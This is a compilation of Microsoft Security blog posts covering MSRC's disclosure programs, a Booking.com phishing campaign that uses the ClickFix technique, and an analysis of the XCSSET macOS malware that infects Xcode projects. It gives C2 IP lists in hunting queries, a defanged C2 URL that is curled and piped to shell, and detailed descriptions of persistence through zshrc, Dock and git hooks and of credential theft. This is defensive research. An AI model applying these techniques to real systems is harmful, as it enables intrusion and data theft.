Collaboration through bug bounty programs and researcher recognition

Security researchers are incentivized to find vulnerabilities and report them through a Coordinated Vulnerability Disclosure (CVD) process. Some reported vulnerabilities are eligible for rewards as part of Microsoft’s bug bounty programs. These programs are an important part of our proactive strategy of incentivizing the external security research community to partner with us and help protect our customers from security threats. Since its inception in 2013, Microsoft’s bug bounty programs have awarded more than $60 million in bounties to security researchers.

In 2024, we announced expansions to several existing bounty programs, and launched a new Defender Bounty Program and AI Bounty Program. We also expanded our bug bounty programs with Microsoft Zero Day Quest, which adds $4 million in potential bug bounty rewards for research into high-impact areas, specifically cloud and AI. Security researchers who report a vulnerability that isn’t eligible for a bug bounty can still take part in the Microsoft Researcher Recognition Program and be recognized for their work on the Researcher Leaderboard.

Coordinated Vulnerability Disclosure (CVD)

Microsoft follows the CVD principle when partnering with external security researchers to respond and mitigate vulnerabilities in our products and services. This approach gives researchers recognition for their work—and provides Microsoft an opportunity to address newly reported vulnerabilities before bad actors can exploit them.

To better protect our products and services, MSRC partners with Microsoft engineering teams to build proactive mitigations using the information provided by both internal and external security researchers. This can significantly reduce or eliminate classes of vulnerabilities.

Many of the cloud service vulnerabilities are fixed by Microsoft on our servers and don’t require customers to take action to stay secure, but for purposes of transparency we now disclose all critical cloud common vulnerabilities and exposures (CVEs). In cases where Microsoft customers need to act, Microsoft provides customers with clear and timely security guidance.

To help customers accelerate their security response and remediation, Microsoft recently expanded our CVD strategy to include machine-readable Common Security Advisory Framework (CSAF) files that complement our existing CVD data sharing channels. With CSAF files, Microsoft customers now have machine-readable information on known vulnerabilities. This capability is part of our comprehensive strategy for vulnerability disclosure, which includes our Security Updates API and the human-readable vulnerability disclosures provided in the MSRC Security Update Guide.

Microsoft Active Protections Program (MAPP)

The Microsoft Active Protections Program (MAPP) gives security technology providers early access to vulnerability information so that they can more rapidly provide updated protections to their customers. More than 100 MAPP partners receive security vulnerability information from the MSRC in advance of Microsoft’s monthly security update release. Partners use this information to provide protections through their security software or devices, such as antivirus software, network-based intrusion detection systems, or host-based intrusion prevention systems.

To learn about the MAPP program, including which types of organizations are eligible to join MAPP, what is required of member organizations, and MAPP program tiers, read the MAPP Frequently Asked Questions.

Release of security updates

Microsoft-managed backend services require no additional customer action to stay secure. In cases where customers must take action to stay secure, we release security updates.

After a vulnerability that requires customers to take action has been fixed in our products, MSRC provides updates. MSRC releases security updates for most Microsoft products on the second Tuesday of each month at 10:00 AM PT and recommends that IT administrators and other customers plan their deployment schedules accordingly.

Cybersecurity education through content and conferences

A key component of MSRC’s work is to provide educational content for the security community. MSRC shares important public updates on vulnerabilities and more on the MSRC blog (you can also subscribe through the MSRC RSS feed). The latest information about security-related deployments, known vulnerabilities, and advisories can be found on the Security Update Guide.

MSRC also works to build a stronger security researcher community by hosting the BlueHat security conference. BlueHat brings together leading researchers and security practitioners, providing a platform to share knowledge and best practices around security. If you missed the latest conference, you can view on-demand presentations from past conferences or listen to the BlueHat Podcast (subscribe here).

Learn more about the Microsoft Security Response Center

To learn more about MSRC, visit us at msrc.microsoft.com. There, you can find detailed information on our programs and access educational resources. You can also learn more about MSRC and Microsoft’s related security initiatives through the following resources:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post How MSRC coordinates vulnerability research and disclosure while building community appeared first on Microsoft Security Blog.

Categories: Microsoft

Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware

Microsoft Malware Protection Center - Thu, 03/13/2025 - 11:00am

Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. As of February 2025, this campaign is ongoing.

This phishing attack specifically targets individuals in hospitality organizations in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe, that are most likely to work with Booking.com, sending fake emails purporting to be coming from the agency.

In the ClickFix technique, a threat actor attempts to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware. This need for user interaction could allow an attack to slip through conventional and automated security features. In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.

Microsoft tracks this campaign as Storm-1865, a cluster of activity related to phishing campaigns leading to payment data theft and fraudulent charges. Organizations can reduce the impact of phishing attacks by educating users on recognizing such scams. This blog includes additional recommendations to help users and defenders defend against these threats.

Phishing campaign using the ClickFix social engineering technique

In this campaign, Storm-1865 identifies target organizations in the hospitality sector and targets individuals at those organizations likely to work with Booking.com. Storm-1865 then sends a malicious email impersonating Booking.com to the targeted individual. The content of the email varies greatly, referencing negative guest reviews, requests from prospective guests, online promotion opportunities, account verification, and more.

Figure 1. A sample phishing email, purporting to be from a prospective guest. Figure 2. Another sample phishing email, purportedly requiring the recipient to address negative feedback about a hotel. Figure 3. Another sample phishing email, purportedly requiring the recipient to verify their Booking.com account.

The email includes a link, or a PDF attachment containing one, claiming to take recipients to Booking.com. Clicking the link leads to a webpage that displays a fake CAPTCHA overlayed on a subtly visible background designed to mimic a legitimate Booking.com page. This webpage gives the illusion that Booking.com uses additional verification checks, which might give the targeted user a false sense of security and therefore increase their chances of getting compromised.

The fake CAPTCHA is where the webpage employs the ClickFix social engineering technique to download the malicious payload. This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard:

Figure 4. A screenshot of the fake Booking.com webpage, with the fake CAPTCHA overlay outlining the ClickFix process.

The command downloads and launches malicious code through mshta.exe:

Figure 5. An example of the mshta.exe command that the targeted user launches.

This campaign delivers multiple families of commodity malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. Depending on the specific payload, the specific code launched through mshta.exe varies. Some samples have downloaded PowerShell, JavaScript, and portable executable (PE) content.

All these payloads include capabilities to steal financial data and credentials for fraudulent use, which is a hallmark of Storm-1865 activity. In 2023, Storm-1865 targeted hotel guests using Booking.com with similar social engineering techniques and malware. In 2024, Storm-1865 targeted buyers using e-commerce platforms with phishing messages leading to fraudulent payment webpages. The addition of ClickFix to this threat actor’s tactics, techniques, and procedures (TTPs) shows how Storm-1865 is evolving its attack chains to try to slip through conventional security measures against phishing and malware.

Figure 6. Diagram illustrating the stages of the infection process in this campaign. Attribution

The threat actor that Microsoft tracks as Storm-1865 encapsulates a cluster of activity conducting phishing campaigns, leading to payment data theft and fraudulent charges. These campaigns have been ongoing with increased volume since at least early 2023 and involve messages sent through vendor platforms, such as online travel agencies and e-commerce platforms, and email services, such as Gmail or iCloud Mail.

Recommendations

Users can follow the recommendations below to spot phishing activity. Organizations can reduce the impact of phishing attacks by educating users on recognizing these scams.

Check the sender’s email address to ensure it’s legitimate. Assess whether the sender is categorized as first-time, infrequent, or marked as “[External]” by your email provider. Hover over the address to ensure that the full address is legitimate. Keep in mind that legitimate organizations do not send unsolicited email messages or make unsolicited phone calls to request personal or financial information. Always navigate to those organizations directly to sign into your account.

Contact the service provider directly. If you receive a suspicious email or message, contact the service provider directly using official contact forms listed on the official website.

Be wary of urgent calls to action or threats. Remain cautious of email notifications that call to click, call, or open an attachment immediately. Phishing attacks and scams often create a false sense of urgency to trick targets into acting without first scrutinizing the message’s legitimacy.

Hover over links to observe the full URL. Sometimes, malicious links are embedded into an email to trick the recipient. Simply clicking the link could let a threat actor download malware onto your device. Before clicking a link, ensure the full URL is legitimate. For best practice, rather than following a link from an email, search for the company website directly in your browser and navigate from there.

Search for typos. Phishing emails often contain typos, including within the body of the email, indicating that the sender is not a legitimate, professional source, or within the email domain or URL, as mentioned previously. Companies rarely send out messages without proofreading content, so multiple spelling and grammar mistakes can signal a scam message. In addition, check for very subtle misspellings of legitimate domains, a technique known as typosquatting. For example, you might see micros0ft[.]com, where the second o has been replaced by 0, or rnicrosoft[.]com, where the m has been replaced by r and n.

Microsoft recommends the following mitigations to reduce the impact of this threat.

  • Pilot and deploy phishing-resistant authentication methods for users.
  • Enforce multi-factor authentication (MFA) on all accounts, remove users excluded from MFA, and strictly require MFA from all devices in all locations at all times.
  • Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft 365 applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links used in phishing and other attacks.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attack tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
  • Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Enable Zero-hour auto purge (ZAP) in Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.

Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent common attack techniques:

Detection details

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

Microsoft Defender for Endpoint

The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity:

  • Suspicious command in RunMRU registry
  • Suspicious PowerShell command line
  • Use of living-off-the-land binary to run malicious code
  • Possible theft of passwords and other sensitive web browser information
  • Suspicious DPAPI Activity
  • Suspicious mshta process launched
  • Suspicious phishing activity detected
Microsoft Defender for Office 365

Microsoft Defender for Office 365 detects malicious activity associated with this threat through the following alerts:

  • This URL has known registrant pattern for malicious activity.
  • This URL impersonates booking.com
  • This PDF has generic phishing traits.
  • This URL has generic phishing traits.
Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article
  • Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Network connections to known C2 infrastructure related to this activity

Look for network connections with known C2 infrastructure.

let c2Servers = dynamic(['92.255.57.155','147.45.44.131','176.113.115.170','31.177.110.99','185.7.214.54','176.113.115.225','87.121.221.124','185.149.146.164']); DeviceNetworkEvents | where RemoteIP has_any(c2Servers) | project Timestamp, DeviceId, DeviceName, LocalIP, RemoteIP, InitiatingProcessFileName, InitiatingProcessCommandLine Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Below are the queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub, using an ARM template or manually.

Hunt normalized Network Session events using the ASIM unifying parser _Im_NetworkSession for IOCs:

let lookback = 30d; let ioc_ip_addr = dynamic(['92.255.57.155','147.45.44.131','176.113.115.170','31.177.110.99','185.7.214.54','176.113.115.225','87.121.221.124','185.149.146.164']); _Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now()) | where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains) | summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor

Hunt normalized Web Session events using the ASIM unifying parser _Im_WebSession for IOCs:

let lookback = 30d; let ioc_ip_addr = dynamic(['92.255.57.155','147.45.44.131','176.113.115.170','31.177.110.99','185.7.214.54','176.113.115.225','87.121.221.124','185.149.146.164']); _Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now()) | where DstIpAddr has_any (ioc_ip_addr) | summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor

Hunt normalized File events using the ASIM unifying parser imFileEvent for IOCs:

let ioc_sha_hashes =dynamic(["01ec22c3394eb1661255d2cc646db70a66934c979c2c2d03df10127595dc76a6"," f87600e4df299d51337d0751bcf9f07966282be0a43bfa3fd237bf50471a981e ","0c96efbde64693bde72f18e1f87d2e2572a334e222584a1948df82e7dcfe241d"]); imFileEvent | where SrcFileSHA256 in (ioc_sha_hashes) or TargetFileSHA256 in (ioc_sha_hashes) | extend AccountName = tostring(split(User, @'\')[1]), AccountNTDomain = tostring(split(User, @'\')[0]) | extend AlgorithmType = "SHA256" Indicators of compromise IndicatorTypeDescription92.255.57[.]155IP addressC2 server delivering XWorm147.45.44[.]131IP addressC2 server delivering Danabot176.113.115[.]170IP addressC2 server delivering LummaStealer31.177.110[.]99IP addressC2 server delivering Danabot185.7.214[.]54IP addressC2 server delivering XWorm176.113.115[.]225IP addressC2 server delivering LummaStealer87.121.221[.]124IP addressC2 server delivering Danabot185.149.146[.]164IP addressC2 server delivering AsyncRAT01ec22c3394eb1661255d2cc646db70a66934c979c2c2d03df10127595dc76a6  File hash (SHA-256)Danabot malwaref87600e4df299d51337d0751bcf9f07966282be0a43bfa3fd237bf50471a981eFile hash (SHA-256)Danabot malware0c96efbde64693bde72f18e1f87d2e2572a334e222584a1948df82e7dcfe241d  File hash (SHA-256)Danabot malware References Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware appeared first on Microsoft Security Blog.

Categories: Microsoft

New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects

Microsoft Malware Protection Center - Tue, 03/11/2025 - 12:00pm

Microsoft Threat Intelligence has uncovered a new variant of XCSSET, a sophisticated modular macOS malware that infects Xcode projects, in the wild during routine threat hunting. Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies. These enhanced features help this malware family steal and exfiltrate files and system and user information, such as digital wallet data and notes, among others.

XCSSET is known for infecting Xcode projects and runs while an Xcode project is being built. Since Xcode is typically used by software developers, we assess that the malware’s mode of infection and propagation leverages on the idea that project files are shared among developers building Apple or macOS-related applications.

While it has resemblances to older XCSSET variants, this new variant is characterized by its modular approach and encoded payloads. It also has improved error handling, and heavily uses scripting languages, UNIX commands, and legitimate binaries. These characteristics allow the malware to have a low profile on an affected device and even remain fileless whenever possible, thus making its detection and removal more challenging.

At the code level, the new XCSSET variant obfuscated its module names, making it difficult to determine the modules’ intent during static analysis. Its enhanced obfuscation techniques extend to its randomized approach for generating payloads to infect Xcode projects and for encoding its payloads. In addition, while older XCSSET variants only used xxd (hexdump) for encoding, the latest one also incorporates Base64. Other notable capabilities of this new variant include its three distinct persistence techniques, which ensure its payload launches whenever a new shell session is initiated or whenever a user is tricked into opening a fake Launchpad application or makes commits in Git, and a new infection method for where the malware places its payload in a target Xcode project. Our analysis also revealed that there are some modules in this new variant’s code that appear to be under development. Its command-and-control (C2) server is also active as of this writing and is downloading additional modules.

In this blog, we discuss how this variant’s different modules work together in achieving the malware’s goals. As part of Microsoft’s commitment to work with the security community to mitigate threats and improve security for all, we have shared these findings with Apple, who acknowledged and thanked us for the information. While we’re only seeing this new XCSSET variant in limited attacks as of this writing, we’re sharing our comprehensive analysis and providing best practices and recommendations more broadly so users and organizations can protect themselves against this threat.

Analyzing the latest XCSSET variant

The new XCSSET variant generally follows a four-stage infection chain, with the fourth-stage payload running various sub-routines. The following sections provide detailed descriptions of each of these modules.

First stage: Xcode shell payload

The payload referenced in this stage gets launched when a user unknowingly builds an infected Xcode project. This obfuscated payload passes through three iterations of a hex decoder and is then piped—or served as input—to shell.

Figure 1. Obfuscated first-stage shell payload

The decoded payload simply makes a curl request to a C2 server, https[:]//bulknames[.]ru/a. The response it receives is then piped to shell.

Second stage: Obfuscated shell command

This payload, which was downloaded by the first-stage shell, collects the affected user’s device operating system information, which it then sends to the C2 server along with a default identifier/tag to download an additional payload. It then pipes the downloaded payload to the shell for execution.

Figure 2. The second-stage command sent to the C2 server Third stage: Downloaded shell payload

This stage again involves a shell script that first checks if the device’s version of XProtect, the built-in antivirus in macOS, is less than 5287. This check is done by running the command “xprotect version” and reading the Info.plist file of the XProtect bundle.

Figure 3. Third-stage shell script

The script then checks and stops any of the referenced processes in Figure 3 and any running osascript processes. It then calculates the date and searches for a hidden file named .a in the home folder. If it finds the file, it updates the said file; otherwise, it creates a new file with the date and other counters/markers.

The script then deletes any existing references to /tmp/l.app and creates a new one. It then downloads another script from the C2 server and saves it at the location /tmp/b. Next, it creates an AppleScript compiled application using osacompile. This AppleScript payload launches the downloaded /tmp/b script.

The script then uses the plutil command to modify the Info.plist file of the created AppleScript application to enable the LSUIElement key. Enabling this key hides the application from the Dock, effectively making the application more of a background process. Finally, the script runs the application in the background, sleeps for 10 seconds, and removes the created application and the /tmp/b script.

Fourth stage: AppleScript payload (/tmp/b or looz)

The fourth stage involves the execution of the created AppleScript application, which essentially runs a shell command. This command passes a Base64-encoded blob through several iterations of a Base64 decoder to obtain the final script, which is subsequently executed.

Figure 4. Base64-encoded fourth-stage AppleScript payload

The decoded script is another AppleScript that first parses the com.apple.launchservices.secure.plist file to determine the default browser for https URLs. It searches for the “https” URL scheme and extracts the corresponding browser’s bundle identifier. The script has explicitly set the variable to “Safari (com.apple.safari)” by default.

The script then fetches the following system information, which it sends to the C2 server as a single string:

  • macOS version
  • Safari version
  • User locale
  • Firewall status
  • System Integrity Protection (SIP) status
  • CPU information

The script also overrides the default log() function so that it can send logs to the C2 server—a capability that can also be seen across the various sub-modules the script launches. The next section provides more information about the sub-modules the script downloads from the C2 server as of this writing.  

The script then checks if the user name is “demo,” possibly to verify if the user account belongs to the threat actor. If the user name checks out, the script processes a specific module, cozfi_xhh, and returns. It also checks the device serial number and exits if the value contains “JV3Q” in it. Next, it calls the boot() function repeatedly with multiple obfuscated module names.

Figure 5. The boot() function of the AppleScript payload

The boot() function has multiple filters with predefined logic and handlers for the module names passed in the argument. In case the module name doesn’t pass any filter, a code in the boot() function downloads an AppleScript that is then launched directly to avoid any artifacts on the disk. Depending on the wait flag passed to this function, the newly downloaded AppleScript is run in either background or foreground.

Sub-modules

The sub-modules that the fourth-stage script downloads follow the similar format where a Base64-encoded blob is passed through multiple iterations of a Base64 decoder before being launched directly.

Figure 6. Format of the encoded sub-modules seizecj (Steals system information)

This sub-module exfiltrates system information to the C2 server. The information it retrieves includes:

  • Applications list
  • System applications list
  • User level LaunchAgents list
  • XProtect version
  • Malware Removal Tool (MRT) version
fpzfcieoci (Lists browser extensions)

This sub-module searches for and lists down the various internet browser extensions it finds installed on the affected device. It has a predefined list of search strings that correspond to the folder paths and files of the browsers that it searches for:

Figure 7. Browser’s path list

This sub-module processes each path individually to search for specific files and extracts metadata about the browser extensions. For example, for Firefox, it extracts lines containing “extensions.webextensions.ExtensionStorageIDB” from the file prefs.js file. For the other browsers, it searches the manifest.json file and extracts the lines containing either “default_title” or “name”. It then stores the extension list in a log file named /tmp/out.txt and uploads this file to the C2 server.

hxasoxtfd (Downloads an additional module)

This sub-module is a downloader that requests a module name from the C2 server every 120 seconds.

Figure 8. doMain() function of the module

If a module name is received from the C2 server, the system proceeds to call the boot() function with the received module name. This function includes filters on the module name, similar to those observed in the parent (fourth-stage) payload. In case the filters don’t pass, this sub-module proceeds to download and launch directly the payload received from the C2, again to avoid any artifacts on the disk.

txzx_vostfdi (Steals digital wallet data from browsers)

This sub-module first sends a request to retrieve a path list from the C2 server. The following screenshot is an example of a path list received from the C2:

Figure 9. Path list received from C2 server

Based on the specified paths, this sub-module appears to search for many cryptocurrency digital wallet extensions across various browsers and their directories. This information is primarily determined by examining the identifiers, such as the following:

Digital wallet extensionIdentifierMetaMasknkbihfbeogaeaoehlefnkodbefgpgknn
ejbalbakoplchlghecdalmeeeajnimhmTokenPocketmfgccjchihfkkindfppnaooecgfneiiiTronLinkibnejdfjmmkpcnlpebklmnkoeoihofec BNB Chain WalletfhbohimaelbohpjbbldcngcnapndodjpPhantom Walletbfnaelmomeimhlpmgjnjophhpkkoljpa

This sub-module archives the collected data, which it then sends back to the C2 server.

hfdieiz (Establishes persistence)

This sub-module establishes persistence through two different methods, zshrc and Dock, which will be discussed in the following sections. It first creates a folder named com.apple.finder in the ~/Library/Caches/ directory.

This sub-module generates payload by randomly selecting a C2 server from a predefined list and selecting an encoding method, which is either Base64 or xxd. It then chooses the number of iterations required to encode or decode the payload. The final encoded payload is then generated and returned. The argument received in the function is placed as a marker at “p=” in the payload request.

Figure 10. Payload generation function of the persistence sub-module

zshrc method

In this persistence method, the sub-module first checks the value of the RESTORE_DEFAULT global variable. If the value is set to “True”, the sub-module deletes the ~/.zshrc_aliases file; otherwise, it retrieves the payload body and saves it to the ~/.zshrc_aliases file. The subsequent payload involves verifying the existence of the .zshrc_aliases file and executing it if it is present. The script then ensures that the ~/.zshrc file exists. It searches for the presence of the string “.zshrc_aliases” within this file and appends the final payload if it is absent. This persistence method guarantees the execution of the payload whenever a new shell session is created.

Figure 11. zshrc persistence method

Dock method

In this persistence method, the sub-module first downloads a signed dockutil tool from the C2 server. This tool is mainly used to manage dock items, such as adding, deleting, and updating entries. The sub-module then gets the list of dock items and searches for Launchpad in it. If it finds an entry, it proceeds to call the processItem function, which then creates a fake Launchpad application in the ~/Library/Caches/com.apple.finder folder.

Figure 12. Creation of the fake Launchpad application and file URI replacement

The processItem function proceeds to get the corresponding payload application body from getPayloadForApp() function, which then initially verifies whether the passed application name is “Launchpad.” If it is, then the payload body for Launchpad is retrieved using the getPayloadBody() function.

In the getPayloadForApp() function, the final payload is configured to first invoke the legitimate Launchpad application and then launch the generated malicious payload. The final payload body is then returned to the processItem function.

Figure 13. Function to create payload for the application

The processItem function also has a logic to update the persisted payload in case it is already found on the device. If the device has no prior infection, the function first compiles an AppleScript payload to an application with the “run-only” flag. This flag could make it challenging to reverse engineer the code and evade static analysis. The function then saves the payload to a file in the parent directory. Next, it checks if the application name is “Launchpad” and, if it is, modifies the Info.plist file’s entries to enable the LSUIElement key and update CDBundleDisplayName. It then downloads InfoPlist.locatable and Launchpad’s icon from the C2 server, replaces the created application’s icon with it, and performs an ad-hoc signing on the application.

Finally, the processItem function uses the dockutil binary to replace the existing Launchpad entry with the fake Launchpad’s application path. It does this by replacing the file URI entry of the legitimate Launchpad application with the fake one. These steps ensure that every time the user starts Launchpad from the dock, the malicious created application is launched, which then runs both the legitimate Launchpad and the generated payload.

cozfi_xhh (Steals notes from the Notes application )

This sub-module steals notes from the affected device’s Notes application through a JavaScript payload.

It initializes a variable named permissionApp to path to /Applications/Reminders.app, where the fake Reminders application is created, and to /Applications/Reminders.app/Notes/, where the stolen notes are saved. It is important to note that the legitimate Reminders application can be found in the /System/Applications directory. The sub-module then removes the Notes folder if it exists inside the fake Reminders application. It also checks for the presence of the fake Reminders application on the device and creates one if it’s not present.

Figure 14. Creation of AppleScript-compiled application to launch a malicious JavaScript payload that steals notes

This sub-module creates an AppleScript-compiled application with the flag set to “Run only.” This application’s script launches the /tmp/.n file using osascript. The sub-module then downloads an icon file from the C2 server. Next, it modifies the Info.plist file by updating the CFBundleDisplayName and CFBundleExecutable and enabling the LSUIElement key. Finally, it performs an ad-hoc signing for this newly created application.

After the creation of the application, the sub-module checks the global variable FORCED flag, which is set to “False” by default in the script. If the FORCED flag is set to “True”, the sub-module calls the exec function directly. Otherwise, it first sends a request to the C2 server to obtain a folder list. The code expects to receive “notes_app” in the response. If this application is present, it enters a loop, waiting for the Notes application to start before calling the exec function. The exec function then subsequently calls the runloop function.

The runloop function first sets the payload, which is basically a JavaScript code. Meanwhile, the run() function of the JavaScript payload first checks and connects to the Notes application present in the Systems directory, retrieves all notes, and saves each note’s contents, creation date, and modification date into an HTML file in the Notes folder within the Reminders application created previously.

Figure 15. JavaScript payload that steals notes from the affected device

The sub-module saves the JavaScript payload into the /tmp/.n file. It then launches the Reminders application to run the said payload. It checks for the existence of Notes folder and, if absent, retries up to three times by resetting the Transparency, Consent, and Control (TCC) database for AppleEvents before deleting the created Reminders application. If the Notes folder exists, it returns a “200” code. When the sub-module’s parent function receives the said “200” code, it archives the Notes folder within the created fake Reminders application and exfiltrates it to the C2 server.

Figure 16. Retry method of resetting TCC database Modules listed under finderModules list in boot() function

In the boot() function of the fourth-stage AppleScript module, there is a specific handler code for certain modules found under the finderModules list.

Figure 17. Handler for modules defined in finderModules list

Figure 17 shows how the fourth-stage payload downloads the module passed to the boot() function into the /tmp/.f file. It then calls the boot() function again with a specific module named vectfd_xhh.

Let’s first look at the common module invoked for each of the other modules on the list.

vectfd_xhh (Launches application for modules)

In this module, the doMain() function checks the existence of either Xcode or Git. If either application is found, several global variables are set with a certain application’s display name, file path, and icon name.

Figure 18. Selection of launcher application for creation

If neither application is present, the module defaults to Finder.app. Subsequently, the doInstall() function is called for each case. It should be noted that the legitimate Finder and Terminal applications are located in the /System/Applications/ folder and not in /Applications/.

In the doInstall() function, the existence and version of the fake application in context is first checked. If the fake application isn’t present or is outdated:

  • If the current process in context is Xcode or Finder, the module waits for the corresponding legitimate application to launch first before calling the createLoop() function
  • If the current process in context is Terminal, the module directly calls the createLoop() function

The createLoop() function deletes any prior existence of the application before creating the fake one. The created application is AppleScript-compiled with the flag set to “Run only,” and it executes a script located at /tmp/.i. Similar to the previous fake application-creating modules, the created application’s icon and plist entries are modified, and is ad-hoc signed.

Figure 19. Payload of the launcher application that launches the main module to be executed

The module then calls the runAppFile() function. This function first sets a payload where it attempts to get a listing of the user’s directories, possibly to check TCC permissions. If the command succeeds, this function deletes any existing error file (/tmp/.e); otherwise, it creates the file. The payload then launches the /tmp/.f file that was downloaded in the parent (fourth-stage) module.

Next, the runAppFile() function saves the payload it set initially in the /tmp/.i file and launches the created application. This created application in turn launches the /tmp/.i file, which, in turn, also executes the /tmp/.f file.

If the directory listing command isn’t successful, the error file is created. If this error file exists, the function returns code “403”. If the parent function receives this code, it retrieves the CFBundleIdentifier of the created application, resets the TCC database for that bundle ID, and calls the createLoop() function again.

dfhsebxzod (Infects Xcode projects)

This module, which is launched by the launcher module vectfd_xhh, is designed to infect Xcode projects located on the target device. It initially retrieves the user’s home directory and subsequently invokes two distinct functions to search and process files.

Figure 20. Searching Xcode projects in a target folder

The first function searches for xcodeproj directories, excluding certain specified directories. The other function downloads a binary, presumed to be a 7-Zip binary, from the C2 server. It then searches the HOME folder, excluding specified directories, for .zip files. When it finds these .zip files, it scans the archive listing for “xcodeproj.” If it finds this entry, the module contains a logic to extract the project files, modify them, and update the archive with the modified files.

For both functions, each directory or file match triggers a subsequent function that searches for a .pbxproj file within the given directory. This new function then randomly selects one of three infection methods: RULE, TARGET, or FORCED_STRATEGY. The infection method determines how the payload will be placed and referenced in the .pbxproj file.

An example infection method that wasn’t mentioned in previously published research is part of FORCED_STRATEGY method. This method includes the use of TARGET_DEVICE_FAMILY variable under Build Settings, which contains the generated payload.

Figure 21. FORCED_STRATEGY method of infecting a pbxproj file

Next, it adds a PBXShellScriptBuildPhase in the .pbxproj file where the payload will be present in the shellScript key.

The payload generation was done in a separate function where it first defines three specific domains and randomly selects one from them. It uses either the xxd or Base64 encoding method, also chosen at random.

Figure 22. Function to generate a payload that infects a pbxproj file

This method also selects a random value between 2 and 5 to determine the number of iterations for encoding/decoding. The first payload includes an encoded curl request to the specified C2 server, the output of which is piped to the shell for execution. The final payload, which consists of the above encoded data and a decoding string, is also piped to shell for execution.

jez (Establishes persistence through Git commits)

This module attempts to establish persistence by incorporating its payload into the pre-commit hooks within the .git directory of projects located on the device.

Figure 23. Infection of hooks/pre-commit file in Git’s directory

It searches for .git folders the in the user’s home directory and sub-directories using the find command. It searches up to six levels of sub-directories and excludes those named Movies, Library, Music, and Pictures. For each .git directory found, this module checks for the presence of the hooks/pre-commit file within those directories. If it finds the file, it removes any existing payload content and appends the newly created payload.

